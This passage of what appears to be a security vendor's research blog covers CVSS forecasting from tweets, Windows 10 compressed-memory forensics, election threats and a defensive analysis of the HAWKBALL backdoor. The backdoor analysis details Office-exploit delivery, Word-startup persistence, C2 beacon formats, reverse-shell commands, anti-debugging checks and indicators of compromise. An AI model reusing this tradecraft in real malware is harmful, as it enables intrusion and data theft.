Next, we evaluate how well this approach can be used to forecast CVSS ratings. In this evaluation, all tweets must occur a minimum of five days ahead of CVSS scores. The severity forecast score for a CVE is defined as the maximum severity score among the tweets which are relevant and associated with the CVE. Table 1 shows the results of three models: randomly guessing the severity, modeling based on the volume of tweets covering a CVE, and the ML-based approach described earlier in the post. The scoring metric in Table 2 is precision at top K using our logistic regression model. For example, where K=100, this is a way for us to identify what percent of the 100 most severe vulnerabilities were correctly predicted. The random model would predicted 59, while our model predicted 78 of the top 100 and all ten of the most severe vulnerabilities.

Table 2: Comparison of random simulated predictions, a model based just on quantitative features like “likes”, and the results of our model

Exploit Forecasting Results

We also measured the practical ability of our model to identify the exploitability of a CVE in the wild, since this is one of the motivating factors for tracking. To do this, we collected severe vulnerabilities that have known exploits by their presence in the following data sources:

Symantec Antivirus signatures
Symantec Intrusion Prevention System signatures
ExploitDB catalog

The dataset for exploit forecasting was comprised of 377,468 tweets gathered from January 2016 to November 2017. Of the 1,409 CVEs used in our forecasting evaluation, 134 publicly weaponized vulnerabilities were found across all three data sources.

Using CVEs from the aforementioned sources as ground truth, we find our CVE classification model is more predictive of detecting operationalized exploits from the vulnerabilities than CVSS. Table 3 shows precision scores illustrating seven of the top ten most severe CVEs and 21 of the top 100 vulnerabilities were found to have been exploited in the wild. Compare that to one of the top ten and 16 of the top 100 from using the CVSS score itself. The recall scores show the percentage of our 134 weaponized vulnerabilities found in our K examples. In our top ten vulnerabilities, seven were found to be in the 134 (5.2%), while the CVSS scoring’s top ten included only one (0.7%) CVE being exploited.

Table 3: Precision and recall scores for the top 10, 50 and 100 vulnerabilities when comparing CVSS scoring, our simplistic volume model and our NLP model

Conclusion

Preventing vulnerabilities is critical to an organization’s information security posture, as it effectively mitigates some cyber security breaches. In our work, we found that social media content that pre-dates CVE scoring releases can be effectively used by machine learning models to forecast vulnerability scores and prioritize vulnerabilities days before they are made available. Our approach incorporates a novel social sentiment component, which CVE scores do not, and it allows scores to better predict real-world exploitation of vulnerabilities. Finally, our approach allows for a more practical prioritization of software vulnerabilities effectively indicating the few that are likely to be weaponized by attackers. NIST has acknowledged that the current CVSS methodology is insufficient. The current process of scoring CVSS is expected to be replaced by ML-based solutions by October 2019, with limited human involvement. However, there is no indication of utilizing a social component in the scoring effort.

This work was led by researchers at Ohio State under the IARPA CAUSE program, with support from Leidos and FireEye. This work was originally presented at NAACL in June 2019, our paper describes this work in more detail and was also covered by Wired.

Finding Evil in Windows 10 Compressed Memory, Part Three: Automating Undocumented Structure Extraction

Threat Research

Omar Sardar

8 August 2019 at 20:45

This is the final post in the three-part series: Finding Evil in Windows 10 Compressed Memory. In the first post (Volatility and Rekall Tools), the FLARE team introduced updates to both memory forensic toolkits. These updates enabled these open source tools to analyze previously inaccessible compressed data in memory. This research was shared with the community at the 2019 SANS DFIR Austin conference and is available on GitHub (Volatility and Rekall). In the second post (Virtual Store Deep Dive), we looked at the structures and algorithms involved in locating and extracting compressed pages from the Store Manager. The post included a walkthrough of a memory dump designed for analysts to be able to recreate in their own Windows 10 environments. The structures referenced in the walkthrough were all previously analyzed in a disassembler, a manual effort which came in at around eight hours. As you’d expect, this task quickly became a candidate for automation. Our analysis time is now under two minutes!

This final post accompanies my and Dimiter Andonov's BlackHat USA 2019 talk with the series title and seeks to describe the challenges faced in maintaining software that ultimately relies on undocumented structures. Here we introduce a solution to reduce the level of effort of analyzing undocumented structures.

Overview

Undocumented structures within the Windows kernel are always subject to change. The flexibility granted by not publicizing a structure’s composition can be invaluable to a development team. It can allow for the system to grow unencumbered by the need to update helper functions and public documentation. In many cases, even when a publicly available API designed to access the undocumented structures can be leveraged on a live system, incident responders and memory forensic analysts don’t have the luxury of utilizing them. DFIR analysts operating on memory extractions or snapshots ultimately using tools which must recreate the job of an API by manually parsing and traversing structures and reimplementing algorithms used.

Unfortunately, these structures and algorithms are not always up to date in the analysts’ toolkit, leading to incomplete extractions or completely broken investigations. These tools may cease to work after any given update. This is the case with the Windows kernel’s Store Manager component. Structures relied on to locate compressed data in RAM are constantly evolving. This requires some flexibility built into the plugins and a means of reducing the analysis time required to reconstruct these structures.

Leveraging flare-emu

To ease my Store Manager analysis efforts, I looked into Tom Bennett’s flare-emu utility. flare-emu can be viewed as the marriage of IDA Pro with the Unicorn emulation engine. The original use of the framework was to clean up Objective-C function call names due to ambiguity stemming from the unknown id argument for calls to objc_msgSend. Tom was able to use emulation to resolve the ambiguity and clean up his analysis environment. The value I saw in the framework was that the barrier to entry for using Unicorn was now lowered to a point where it could be used to rapidly prototype ideas. flare-emu handles PE loading, memory faults, and function calls while guaranteeing traversal over code you would like to reach.

After analyzing a dozen Windows 10 kernels, I had become familiar enough with the process to begin automating the effort. The automation of undocumented structures and algorithms requires one or more of the following properties to remain constant across builds.

Structure locations
Function prototypes
Order of structure memory access
Structure field usage
Callstacks

Let’s explore the example of locating the offset of ST_DATA_MGR.wCompressionFormat. As shown in Figure 1, this field is the first argument to RtlDecompressBufferEx. This function is publicly available and documented. This is how we originally derived that offset 0x220 in the ST_DATA_MGR structure corresponded to the compression format of the store page in Windows 10 1703 (x86).

Figure 1: Call to RtlDecompressBuferEx, note that the compression format originates from ST_DATA_MGR

To leverage flare-emu in automating the extraction of the value 0x220, we have a few options. For example, from analysis of other kernels, we know that the access to ST_DATA_MGR immediately before decompression is likely to be the compression format. In this case, a stronger extraction algorithm can be leveraged by prepopulating ST_DATA_MGR with a known pattern (see Figure 2).

Figure 2: Known pattern copied into ST_DATA_MGR buffer

Using flare-emu, we emulate the function in which this call is located and examine the stack post-emulation.

0x20101000

0x1163

0x31001200

0x1423

0x20001400

“Km”

Figure 3: Post-emulation stack layout

Knowing that the wCompressionFormat argument originated from the ST_DATA_MGR structure, we see that it is now “Km”. If we were to search for that value in the known pattern, we would find that it begins at offset 0x220. Check out Figure 4 to see how we can leverage flare-emu to solve this challenge.

Figure 4: Code snippet from w10deflate_auto project demonstrating the automation of wCompressionFormat

The decorators preceding the function signify that the extraction algorithm will work on both 32-bit and 64-bit architectures. After generating a known pattern using a helper function within my project, flare-emu is used to allocate a buffer, storing a pointer to it in lp_stdatamgr. The pointer is written into the ECX register because I know that the first argument to the parent function, StDmSinglePageCopy is the pointer to the ST_DATA_MGR structure. The pHook function populates ECX prior to the emulation run. The helper function locate_call_in_fn is usedto perform a relaxed search for RtlDecompressBufferEx within StDmSinglePageCopy. Using flare-emu’s iterate function, I force emulation to reach decompression, at which point I read the first item on the stack and then search for it within my known pattern.

Techniques like the one described above are ultimately used to retrieve all structure fields involved in the page decompression and can be leveraged in other situations in which an undocumented structure may need tracking across Windows builds. Figure 5 shows the automation utility extracting the fields of the undocumented structures used by the Volatility and Rekall plugins.

Figure 5: Output of automation from within IDA Pro

Keeping Volatility and Rekall Updated

The data generated by the automation script is primarily useful when implemented in Volatility and Rekall. In both Volatility and Rekall, the win10_memcompression.py overlay contains all structure definitions needed for page location and decompression. Figure 6 shows a snippet from the file in which the Windows 10 1903 x86 profile is created.

Figure 6: Structure definition found within w10_memcompression.py overlay

Create a new profile dictionary (ex. win10_mem_comp_x86_1903) corresponding to the Windows build that you are targeting and populate the structure entries accordingly.

Conclusion

Undocumented structures pose a challenge to those who rely on them. This blog post covered how flare-emu can be leveraged to reduce the level of effort needed to analyze new files. We analyzed the extraction of an ST_DATA_MGR field used in page decompression by presenting the problem and then the code involved with automating the effort. The automation code is available on the FireEye GitHub with usage information and documentation available in both the README and code.

Finding Evil in Windows 10 Compressed Memory, Part Two: Virtual Store Deep Dive

Threat Research

Omar Sardar

8 August 2019 at 20:30

Introduction

This blog post is the second in a three-part series covering our Windows 10 memory forensics research and it coincides with our BlackHat USA 2019 presentation. In Part One of the series, we covered the integration of the research in both Volatily and Rekall memory forensics tools. We demonstrated that forensic artifacts (including reflectively loaded malware) could remain undiscovered without the FLARE research integration on Windows 10 (available on GitHub at win10_volatility and win10_rekall).

In this post, we demonstrate how to retrieve a compressed page using the structures and algorithms described in our white paper. We track down a compressed page in memory, beginning at its virtual address within a known process. A WinDbg kernel debugger setup is used in this walkthrough, but a similar process could be followed from within a memory snapshot or extraction using Volatility or Rekall.

Finding a Compressed Page

The operating system used in this demo is Windows 10.0.15063.0 (x64) and the structure definitions shown will be applicable across any 1703 build. Note that the two global offsets nt!SmGlobals and nt!MmPagingFile will need to be located for each revision. The process of retrieving these global offsets is described further in our white paper.

To begin analysis, we create a marker page and flush it to the Virtual Store. This can be done in several ways, the easiest of which is allocating memory in a memory constrained virtual machine. A simple utility (ram_eater.exe) was created to perform this task. The ram_eater utility allocates and writes a marker page, and then repeatedly allocates more memory in user-specified page amounts. In a memory constrained virtual machine (1 GB RAM), the marker page will become stale shortly and be evicted to the virtual store. In Figure 1, ram_eater reports that it has allocated the marker page at address 0x2a368480000. The marker page we used (see Figure 2) was a string beginning with “CC WAS HERE!”.

Figure 1: Allocating a marker page using ram_eater_x64.exe

We can verify the contents of our marker page by locating it in the kernel debugger, viewing its Page Table Entry (PTE) and dumping its corresponding physical memory (see Figure 2). We use the !process extension to locate ram_eater’s EPROCESS structure and switch into the context of the ram_eater process. This ensures that we traverse the correct process-specific page tables for the ram_eater process. Using the page frame number (pfn) described by the hardware PTE, we dump the physical memory to validate the contents of our marker page. Page frame numbers do not include the low-order bits used to specify an offset into a page, therefore they must be multiplied by PAGE_SIZE (0x1000) to identify the actual address of the data.

Figure 2: Locating and viewing the marker page from the kernel debugger

After allocating additional memory using ram_eater, we check to see if the marker page has been sent to the virtual store. Each entry in the output of the !vm extension can be treated as an index in to nt!MmPagingFile (see Figure 3).

Figure 3: PTE of a compressed page in the virtual store an confirmation of virtual store’s PageFile index

In the PTE displayed in Figure 3, the PageFile index (MMPTE_SOFTWARE.PageFileLow) is 2 and corresponds to the “No Name for Paging File” entry in the !vm extension’s output. From general observation, we know that on a default Windows configuration, the last entry corresponds to the virtual store. It is possible to configure systems with more than a single PageFile on disk, so do not assume that PageFile index 2 will always correlate to the virtual store.

A more thorough option to validate page file indices is to disassemble nt!MmStoreCheckPagefiles. This function contains references to two global variables, the number of active PageFiles, as well as an array of pointers to each nt!_MMPAGING_FILE structure (see Figure 4). We use the PageFile structure’s newly introduced VirtualStorePagefile field to confirm if the PageFile represents a virtual store.

Figure 4: Locating nt!MmPagingFile in WinDbg and dumping system’s nt!_MMPAGING_FILE structures

Having confirmed that the marker page is in the virtual store, the next step is to calculate the Store Manager Page Key (SM_PAGE_KEY), as it serves as a pseudo-handle to locate the decompressed page. Our white paper details the process used to calculate the SM_PAGE_KEY, which turns out to be 0x201a3061 for this example. Note, that we will not use the PTE’s swizzle bit in the page key calculations, since the OS build is below 1803. To begin page retrieval, the pointer to the Store Manager’s global structure or nt!SmGlobals needs to be located. This is a straightforward process if symbols are available (see Figure 5).

Figure 5: Dumping nt!SmGlobals

The first thing to observe is that both SMKM_STORE_MGR and SMKM are located at offset 0x0, or directly at nt!SmGlobals. Viewed as a memory dump, nt!SmGlobals appears as an array of pointers. Viewed as a two-dimensional array (32x32) of SMKM_STORE_METADATA elements, each element in the array of pointers points to an array of 32 SMKM_STORE_METADATA structures. Each SMKM_STORE_METADATA structure represents a store. To locate our SM_PAGE_KEY’s corresponding store, we need to find the store index associated with the page key inside the SMKM_STORE_MGR.sGlobalTree B+tree container. The store index is a compound value that yields both indices needed to select the particular SMKM_STORE_METADATA element. Let’s traverse the SMKM_STORE_MGR’s global B+tree (Figure 6). Recall that we are interested in a store manager page key value of 0x201a3061.

Figure 6: Traversing the global B+tree

Now that we have the store index (obtained from the SMKM_FRONTEND_ENTRY structure) we calculate both indices to select the correct SMKM_STORE_METADATA structure for our SM_PAGE_KEY. The index in to the pointer array is the result of dividing the retrieved store index by 32, while the second one is the remainder of the division operation. In our case both indices are 0 and they select the first of the 1024 stores on the system, which is reserved for legacy applications. Universal Windows Platform (UWP) applications, on the other hand, will be placed in stores from 1 to 1023. Now, with the SMKM_STORE_METADATA known, we examine the store’s SMKM_STORE structure, as shown in Figure 7.

Figure 7: Dumping the SMKM_STORE structure

Once we have our SMKM_STORE structure we traverse another B+tree that associates our SM_PAGE_KEY (0x201a3061) with a chunk key. The chunk key is a compound value and once decoded points to a specific page record inside SMHP_CHUNK_METADATA's two-dimensional aChunkPointer array. The B+tree traversal is shown in Figure 8.

Figure 8: Traversing the local B+tree to find the chunk key associated with the SM_PAGE_KEY

After the B+tree traversal is complete we found that our chunk key is 4b02d. Since it’s a compound value we need to decode it in order to retrieve the two indices into SMHP_CHUNK_METADATA’s chunk pointer array, and the offset within the located chunk. The decoding involves four additional SHMP_CHUNK_METADATA fields – dwVectorSize, dwPageRecordsPerChunk, dwPageRecordSize, and dwChunkPageHeaderSize. The process is shown in Figure 9.

Figure 9: Retrieving the page record associated with the chunk key

The decoding of the chunk key in Figure 9 allowed us to find all the information to derive the virtual address of our compressed page. The retrieved REGION_KEY (0xf72397, in our case) is also a compound value that encodes the index within the SMKM_STORE’s region pointer array, as well as the offset within the region of pages. To calculate this data, we parse the region key with the help of two fields inside the ST_DATA_MGR structure – dwRegionIndexMask and dwRegionSizeMask. The calculations are shown in Figure 10.

Figure 10: Calculating the compressed page’s virtual address

The virtual address 0x12f3970 calculated in Figure 10 contains the compressed page of interest. We can retrieve it from the MemCompression process space, as shown in Figure 11. To confirm that the compressed memory is located within MemCompression, check the SMKM_STORE structure’s StoreOwnerProcess field.

Figure 11: Retrieving the compressed page from within MemCompression process space

The compressed page can be decompressed with a call to the RtlDecompressBufferEx API or any other implementation that supports the XPRESS compression algorithm.

Conclusion

In this blog post, we shared a walkthrough in which we forced a known marker page into the compression store and manually retrieved it by walking through memory dumps using known structure offsets from Windows 10 1709 x64. The same techniques used here can be applied to Windows 10 1607 and onwards assuming correct structure offsets are known. In Part 3 of the series, Automating Undocumented Structure Extraction, we will look at how the FLARE team leveraged emulation via flare-emu to automate the extraction of the structures used in this walkthrough.

Resources

Government Sector in Central Asia Targeted With New HAWKBALL Backdoor Delivered via Microsoft Office Vulnerabilities

Threat Research

Swapnil Patil

5 June 2019 at 15:00

FireEye Labs recently observed an attack against the government sector in Central Asia. The attack involved the new HAWKBALL backdoor being delivered via well-known Microsoft Office vulnerabilities CVE-2017-11882 and CVE-2018-0802.

HAWKBALL is a backdoor that attackers can use to collect information from the victim, as well as to deliver payloads. HAWKBALL is capable of surveying the host, creating a named pipe to execute native Windows commands, terminating processes, creating, deleting and uploading files, searching for files, and enumerating drives.

Figure 1 shows the decoy used in the attack.

Figure 1: Decoy used in attack

The decoy file, doc.rtf (MD5: AC0EAC22CE12EAC9EE15CA03646ED70C), contains an OLE object that uses Equation Editor to drop the embedded shellcode in %TEMP% with the name 8.t. This shellcode is decrypted in memory through EQENDT32.EXE. Figure 2 shows the decryption mechanism used in EQENDT32.EXE.

Figure 2: Shellcode decryption routine

The decrypted shellcode is dropped as a Microsoft Word plugin WLL (MD5: D90E45FBF11B5BBDCA945B24D155A4B2) into C:\Users\ADMINI~1\AppData\Roaming\Microsoft\Word\STARTUP (Figure 3).

Figure 3: Payload dropped as Word plugin

Technical Details

DllMain of the dropped payload determines if the string WORD.EXE is present in the sample’s command line. If the string is not present, the malware exits. If the string is present, the malware executes the command RunDll32.exe < C:\Users\ADMINI~1\AppData\Roaming\Microsoft\Word\STARTUP\hh14980443.wll, DllEntry> using the WinExec() function.

DllEntry is the payload’s only export function. The malware creates a log file in %TEMP% with the name c3E57B.tmp. The malware writes the current local time plus two hardcoded values every time in the following format:

<Month int>/<Date int> <Hours>:<Minutes>:<Seconds>\t<Hardcoded Digit>\t<Hardcoded Digit>\n

Example:

05/22 07:29:17 4 0

This log file is written to every 15 seconds. The last two digits are hard coded and passed as parameters to the function (Figure 4).

Figure 4: String format for log file

The encrypted file contains a config file of 0x78 bytes. The data is decrypted with an 0xD9 XOR operation. The decrypted data contains command and control (C2) information as well as a mutex string used during malware initialization. Figure 5 shows the decryption routine and decrypted config file.

Figure 5: Config decryption routine

The IP address from the config file is written to %TEMP%/3E57B.tmp with the current local time. For example:

05/22 07:49:48 149.28.182.78.

Mutex Creation

The malware creates a mutex to prevent multiple instances of execution. Before naming the mutex, the malware determines whether it is running as a system profile (Figure 6). To verify that the malware resolves the environment variable for %APPDATA%, it checks for the string config/systemprofile.

Figure 6: Verify whether malware is running as a system profile

If the malware is running as a system profile, the string d0c from the decrypted config file is used to create the mutex. Otherwise, the string _cu is appended to d0c and the mutex is named d0c_cu (Figure 7).

Figure 7: Mutex creation

After the mutex is created, the malware writes another entry in the logfile in %TEMP% with the values 32 and 0.

Network Communication

HAWKBALL is a backdoor that communicates to a single hard-coded C2 server using HTTP. The C2 server is obtained from the decrypted config file, as shown in Figure 5. The network request is formed with hard-coded values such as User-Agent. The malware also sets the other fields of request headers such as:

Content-Length: <content_length>
Cache-Control: no-cache
Connection: close

The malware sends an HTTP GET request to its C2 IP address using HTTP over port 443. Figure 8 shows the GET request sent over the network.

Figure 8: Network request

The network request is formed with four parameters in the format shown in Figure 9.

Format = "?t=%d&&s=%d&&p=%s&&k=%d"

Figure 9: GET request parameters formation

Table 1 shows the GET request parameters.

Value	Information
T	Initially set to 0
S	Initially set to 0
P	String from decrypted config at 0x68
k	The result of GetTickCount()

Table 1: GET request parameters

If the returned response is 200, then the malware sends another GET request (Figure 10) with the following parameters (Figure 11).

Format = "?e=%d&&t=%d&&k=%d"

Figure 10: Second GET request

Figure 11: Second GET request parameters formation

Table 2 shows information about the parameters.

Value	Information
E	Initially Set to 0
T	Initially set to 0
K	The result of GetTickCount()

Table 2: Second GET request parameters

If the returned response is 200, the malware examines the Set-Cookie field. This field provides the Command ID. As shown in Figure 10, the field Set-Cookie responds with ID=17.

This Command ID acts as the index into a function table created by the malware. Figure 12 shows the creation of the virtual function table that will perform the backdoor’s command.

Figure 12: Function table

Table 3 shows the commands supported by HAWKBALL.

Command	Operation Performed
0	Set URI query string to value
16	Unknown
17	Collect system information
18	Execute a provided argument using CreateProcess
19	Execute a provided argument using CreateProcess and upload output
20	Create a cmd.exe reverse shell, execute a command, and upload output
21	Shut down reverse shell
22	Unknown
23	Shut down reverse shell
48	Download file
64	Get drive geometry and free space for logical drives C-Z
65	Retrieve information about provided directory
66	Delete file
67	Move file

Table 3: HAWKBALL commands

Collect System Information

Command ID 17 indexes to a function that collects the system information and sends it to the C2 server. The system information includes:

Computer Name
User Name
IP Address
Active Code Page
OEM Page
OS Version
Architecture Details (x32/x64)
String at 0x68 offset from decrypted config file

This information is retrieved from the victim using the following WINAPI calls:

Format = "%s;%s;%s;%d;%d;%s;%s %dbit"

GetComputerNameA
GetUserNameA
Gethostbyname and inet_ntoa
GetACP
GetOEMPC
GetCurrentProcess and IsWow64Process

Figure 13: System information

The collected system information is concatenated together with a semicolon separating each field:

WIN732BIT-L-0;Administrator;10.128.62.115;1252;437;d0c;Windows 7 32bit

This information is encrypted using an XOR operation. The response from the second GET request is used as the encryption key. As shown in Figure 10, the second GET request responds with a 4-byte XOR key. In this case the key is 0xE5044C18.

Once encrypted, the system information is sent in the body of an HTTP POST. Figure 14 shows data sent over the network with the POST request.

Figure 14: POST request

In the request header, the field Cookie is set with the command ID of the command for which the response is sent. As shown in Figure 14, the Cookie field is set with ID=17, which is the response for the previous command. In the received response, the next command is returned in field Set-Cookie.

Table 4 shows the parameters of this POST request.

Parameter	Information
E	Initially set to 0
T	Decimal form of the little-endian XOR key
K	The result of GetTickCount()

Table 4: POST request parameters

Create Process

The malware creates a process with specified arguments. Figure 15 shows the operation.

Figure 15: Command create process

Delete File

The malware deletes the file specified as an argument. Figure 16 show the operation.

Figure 16: Delete file operation

Get Directory Information

The malware gets information for the provided directory address using the following WINAPI calls:

FindFirstFileW
FindNextFileW
FileTimeToLocalFileTime
FiletimeToSystemTime

Figure 17 shows the API used for collecting information.

Figure 17: Get directory information

Get Disk Information

This command retrieves the drive information for drives C through Z along with available disk space for each drive.

Figure 18: Retrieve drive information

The information is stored in the following format for each drive:

Format = "%d+%d+%d+%d;"

Example: "8+512+6460870+16751103;"

The information for all the available drives is combined and sent to the server using an operation similar to Figure 14.

Anti-Debugging Tricks

Debugger Detection With PEB

The malware queries the value for the flag BeingDebugged from PEB to check whether the process is being debugged.

Figure 19: Retrieve value from PEB

NtQueryInformationProcess

The malware uses the NtQueryInformationProcess API to detect if it is being debugged. The following flags are used:

Passing value 0x7 to ProcessInformationClass:

Figure 20: ProcessDebugPort verification

Passing value 0x1E to ProcessInformationClass:

Figure 21: ProcessDebugFlags verification

Passing value 0x1F to ProcessInformationClass:

Figure 22: ProcessDebugObject

Conclusion

HAWKBALL is a new backdoor that provides features attackers can use to collect information from a victim and deliver new payloads to the target. At the time of writing, the FireEye Multi-Vector Execution (MVX) engine is able to recognize and block this threat. We advise that all industries remain on alert, though, because the threat actors involved in this campaign may eventually broaden the scope of their current targeting.

Indicators of Compromise (IOC)

MD5	Name
AC0EAC22CE12EAC9EE15CA03646ED70C	Doc.rtf
D90E45FBF11B5BBDCA945B24D155A4B2	hh14980443.wll

Network Indicators

149.28.182[.]78:443
149.28.182[.]78:80
http://149.28.182[.]78/?t=0&&s=0&&p=wGH^69&&k=<tick_count>
http://149.28.182[.]78/?e=0&&t=0&&k=<tick_count>
http://149.28.182[.]78/?e=0&&t=<int_xor_key>&&k=<tick_count>
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2)

FireEye Detections

MD5

Product

Signature

Action

AC0EAC22CE12EAC9EE15CA03646ED70C

FireEye Email Security

FireEye Network Security

FireEye Endpoint Security

FE_Exploit_RTF_EQGEN_7

Exploit.Generic.MVX

Block

D90E45FBF11B5BBDCA945B24D155A4B2

FireEye Email Security

FireEye Network Security

FireEye Endpoint Security

Malware.Binary.Dll

FE_APT_Backdoor_Win32_HawkBall_1

APT.Backdoor.Win.HawkBall

Block

Acknowledgement

Thank you to Matt Williams for providing reverse engineering support.

Framing the Problem: Cyber Threats and Elections

Threat Research

Luke McNamara

30 May 2019 at 15:00

This year, Canada, multiple European nations, and others will host high profile elections. The topic of cyber-enabled threats disrupting and targeting elections has become an increasing area of awareness for governments and citizens globally. To develop solutions and security programs to counter cyber threats to elections, it is important to begin with properly categorizing the threat. In this post, we’ll explore the various threats to elections FireEye has observed and provide a framework for organizations to sort these activities.

The Election Ecosystem: Targets

Historically, FireEye has observed targeting of a wide range of organizations connected to elections. In considering their role and criticality to the process of elections, these various entities can be grouped into three categories: core election infrastructure, supporting organizations involved in the administration of elections, and other groups that have a participatory role in the electoral process. All of these entities may be targeted for a variety of reasons to influence or collect intelligence on the electoral process and participants.

FireEye is aware of only limited indications of entities targeted in the first category (light blue area). Although we have not observed direct evidence that actors have manipulated the electoral process in any major national or regional election by infiltrating the systems or hardware used to record or tally votes, the sheer complexity of these systems prevents us from categorically stating that these systems have not been successfully compromised.

Moving outward into the gray section of the diagram, entities that fall into this category include organizations involved in the administration of elections. While these organizations may maintain networks separate from voting systems and tabulation platforms, they play important roles in overseeing and communicating results to the public. FireEye has witnessed breaches into a variety of these organizations, in some cases for the purpose of collecting intelligence or in others to coopt and display false information on publicly-facing systems as part of an influence campaign.

Lastly, FireEye has observed targeting of organizations that are involved in election campaigns and news coverage. Tactics we have witnessed include disinformation campaigns on adversary-maintained infrastructure and social media platforms. For example, in August 2017, we observed several inauthentic news websites created to mimic legitimate local and international media organizations ahead of a sub-Saharan African nation’s presidential election. A subset of the counterfeit domains appears to have been created in coordination with each other, if not by the same actor, to damage the reputation of the presidential nominee for the opposition party.

The Threat Activity

To counter and mitigate risks to elections, properly categorizing the specific activity and intent is important. While terms like “election interference” are often used to describe all of the threats in this space, some of the malicious activity FireEye has witnessed may fall outside this definition. Broadly speaking most election-related threats can be thought of in four categories: social-media enabled disinformation, cyber espionage, “hack and leak” campaigns, and attacks on critical election infrastructure.

Social-Media Enabled Disinformation: This category includes the activity FireEye has tracked from the Russia-affiliated Internet Research Association (IRA) and various Iranian disinformation operations. In some cases, this has involved creating fraudulent content on controversial issues and seeking to promote it across social media platforms. In other examples, disinformation campaigns have focused on amplifying already issues that have organic interest. Some of these campaigns may also be involved in politically-motivated messaging on social media platforms prior to elections without a specific focus electoral events.
Cyber Espionage: Nation state actors like Russia-nexus APT28 and Sandworm Team, and China-nexus APT40, have carried out cyber espionage operations against multiple types of targets in the election ecosystem. This has ranged from intrusions into everything from political campaigns to election commissions, likely for a variety of reasons. In some cases, these actors are possibly seeking to obtain information on policy stances of candidates and political parties. In other situations—particularly against election administrators or system vendors—it is possible that these intrusions are reconnaissance for further operations, seeking to understand network layouts that may allow them to move into more critical infrastructure.
“Hack and Leak” Campaigns: Some threat actors that FireEye has observed have utilized the data they’ve gained from espionage intrusions to then leak that information with the intent of influencing public perception. In this manner, they combine the previous two categories of activity. Notably, this tactic has been employed by Guccifer 2.0 and DC Leaks in the 2016 U.S. election. In some cases, similar tactics have leveraged compromised infrastructure to carry out disinformation operations, such as in the 2014 Ukrainian presidential campaign in which Russian-nexus actors posted erroneous election results from the compromised Ukrainian election commission website.
Attacks on Critical Election Infrastructure : Compromises into core critical infrastructure such as election management systems, voting systems, electronic pollbooks, and others represent the most critical risks to elections, with the potential to alter or delete votes or voters from voter rolls. Though this is an often-discussed risk, there is limited evidence of intrusion activity targeting core election infrastructure.

Of the activity described here, FireEye has observed a full spectrum of campaigns by Russian-nexus actors, from carrying out intrusions into organizations and stealing data, leaking that data through online personas and fronts, as well as targeting of election infrastructure. From limited observations, China has for the most part focused solely on cyber espionage operations, as in the case of activity FireEye reported on in the targeting the 2018 Cambodian election. From various motivations, FireEye has also witnessed limited evidence of activity from hacktivists and criminal entities in targeting parts of the election ecosystem.

Conclusion

While there is increasing global awareness of threats to elections, election administrators and others continue to face challenges in ensuring the integrity of the vote. To properly counter threats to elections, individuals and organizations involved in the electoral process should:

Learn the Playbook of the Adversary: Proactive organizations can learn from the activity of threat actors uncovered in other elections and implement security controls that adapt to new tools and TTPs. Political campaigns and others should also educate staff and contractors on common spear-phishing tactics used by some of the primary APT groups.
Incorporate Threat Intelligence for Context: Operationally, security organizations can utilize threat intelligence to better differentiate and triage the most important alerts from untargeted commodity malware activity.
Anticipate External Threats: Beyond the internal networks of county governments and political campaigns, election administrators and risk management professionals involved in elections should prepare plans for dealing with leaked and compromised data, understanding how threat actors may utilize this for disinformation campaigns.

I will be speaking about cyber threats and elections during FireEye Virtual Summit, so register today to learn more.

Learning to Rank Strings Output for Speedier Malware Analysis

Threat Research

Philip Tully

29 May 2019 at 14:30

Reverse engineers, forensic investigators, and incident responders have an arsenal of tools at their disposal to dissect malicious software binaries. When performing malware analysis, they successively apply these tools in order to gradually gather clues about a binary’s function, design detection methods, and ascertain how to contain its damage. One of the most useful initial steps is to inspect its printable characters via the Strings program. A binary will often contain strings if it performs operations like printing an error message, connecting to a URL, creating a registry key, or copying a file to a specific location – each of which provide crucial hints that can help drive future analysis.

Manually filtering out these relevant strings can be time consuming and error prone, especially considering that:

Relevant strings occur disproportionately less often than irrelevant strings.
Larger binaries can output upwards of tens of thousands of individual strings.
The definition of "relevant” can vary significantly across individual human analysts.

Investigators would never want to miss an important clue that could have reduced their time spent performing the malware analysis, or even worse, led them to draw incomplete or incorrect conclusions. In this blog post, we will demonstrate how the FireEye Data Science (FDS) and FireEye Labs Reverse Engineering (FLARE) teams recently collaborated to streamline this analyst pain point using machine learning.

Highlights

Running the Strings program on a piece of malware inevitably produces noisy strings mixed in with important ones, which can only be uncovered after sifting and scrolling through the entirety of its messy output. FireEye’s new machine learning model that automatically ranks strings based on their relevance for malware analysis speeds up this process at scale.
Knowing which individual strings are relevant often requires highly experienced analysts. Quality, security-relevant labeled training data can be time consuming and expensive to obtain, but weak supervision that leverages the domain expertise of reverse engineers helps accelerate this bottleneck.
Our proposed learning-to-rank model can efficiently prioritize Strings outputs from individual malware samples. On a dataset of relevant strings from over 7 years of malware reports authored by FireEye reverse engineers, it also performs well based on criteria commonly used to evaluate recommendation and search engines.

Background

Each string returned by the Strings program is represented by sequences of 3 characters or more ending with a null terminator, independent of any surrounding context and file formatting. These loose criteria mean that Strings may identify sequences of characters as strings when they are not human-interpretable. For example, if consecutive bytes 0x31, 0x33, 0x33, 0x37, 0x00 appear within a binary, Strings will interpret this as “1337.” However, those ASCII characters may not actually represent that string per se; they could instead represent a memory address, CPU instructions, or even data utilized by the program. Strings leaves it up to the analyst to filter out such irrelevant strings that appear within its output. For instance, only a handful of the strings listed in Figure 1 that originate from an example malicious binary are relevant from a malware analyst’s point of view.

Figure 1: An example Strings output containing 44 strings for a toy sample with a SHA-256 value of eb84360ca4e33b8bb60df47ab5ce962501ef3420bc7aab90655fd507d2ffcedd.

Ranking strings in terms of descending relevance would make an analyst’s life much easier. They would then only need to focus their attention on the most relevant strings located towards the top of the list, and simply disregard everything below. However, solving the task of automatically ranking strings is not trivial. The space of relevant strings is unstructured and vast, and devising finely tuned rules to robustly account for all the possible variations among them would be a tall order.

Learning to Rank Strings Output

This task can instead be formulated in a machine learning (ML) framework called learning to rank (LTR), which has been historically applied to problems like information retrieval, machine translation, web search, and collaborative filtering. One way to tackle LTR problems is by using Gradient Boosted Decision Trees (GBDTs). GBDTs successively learn individual decision trees that reduce the loss using a gradient descent procedure, and ultimately use a weighted sum of every trees’ prediction as an ensemble. GBDTs with an LTR objective function can learn class probabilities to compute each string’s expected relevance, which can then be used to rank a given Strings output. We provide a high-level overview of how this works in Figure 2.

